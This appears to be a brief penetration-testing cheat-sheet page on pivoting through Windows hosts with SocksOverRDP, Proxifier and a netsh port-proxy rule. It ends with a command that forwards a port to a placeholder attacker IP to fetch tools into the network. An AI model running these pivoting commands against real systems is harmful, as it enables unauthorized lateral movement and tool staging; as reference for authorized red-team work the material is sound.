SocksOverRDP
Last updated
Profile > Proxy Server > Add
127.0.0.1 1080 Socks5# On first Windows pivot host:
regsvr32.exe SocksOverRDP-Plugin.dll
# RDP to second host — you'll get a SocksOverRDP popup
mstsc.exe
# On second host (the one you RDP'd into):
# Transfer and run SocksOverRDP-Server.exe with admin privs
.\SocksOverRDP-Server.exe
# Verify:
netstat -ano | findstr 1080
# On first pivot host, use Proxifier with 127.0.0.1:1080 SOCKS
# Set up port forward to get tools from attacker:
netsh.exe interface portproxy add v4tov4 listenport=9999 listenaddress=0.0.0.0 connectport=8000 connectaddress=<attacker_ip>